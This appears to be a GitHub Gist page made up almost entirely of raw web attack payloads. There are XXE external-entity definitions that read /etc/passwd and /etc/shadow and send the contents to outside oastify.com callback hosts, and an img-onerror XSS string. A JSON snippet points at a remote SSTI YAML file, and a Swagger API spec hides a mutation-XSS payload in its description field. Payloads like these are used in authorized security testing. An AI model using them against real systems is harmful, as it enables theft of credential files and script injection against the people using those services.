Skip to content

Instantly share code, notes, and snippets.

<!ENTITY % payload1 SYSTEM "http://187ep18dukxwfw02dwcwafrb42awysmh.oastify.com">
<!ENTITY % payload2 SYSTEM "http://bgvoxbgn2u56n68cl6k6ipzlcci663us.oastify.com">
<!ENTITY % payload3 SYSTEM "file:///etc/passwd">
<!ENTITY % payload4 SYSTEM "file:///etc/shadow">
<!ENTITY % payload5 "<!ENTITY &#x25; exfil1 SYSTEM 'http://%payload1;.8pyl68pkbre3w3h9u3t3rm8il9r3f13q.oastify.com'>">
<!ENTITY % payload5 "<!ENTITY &#x25; exfil1 SYSTEM 'http://%payload3;?r4w4lr43qatmbmws9m8m65n10s6mulia.oastify.com'>">
"><img src=x onerror=alert(1)>
{
"url": "https://gist.githubusercontent.com/Sushahuja7/3896cc334a8cc7a453c8e8e57067278c/raw/0e46028a55bb347795fbc267848dbcf32c5264dc/ssti.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/Sushahuja7/3896cc334a8cc7a453c8e8e57067278c/raw/0e46028a55bb347795fbc267848dbcf32c5264dc/ssti.yaml",
"name": "Foo"
}
]
}
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
version: production
basePath: /JSSResource/
produces:
- application/xml
- application/json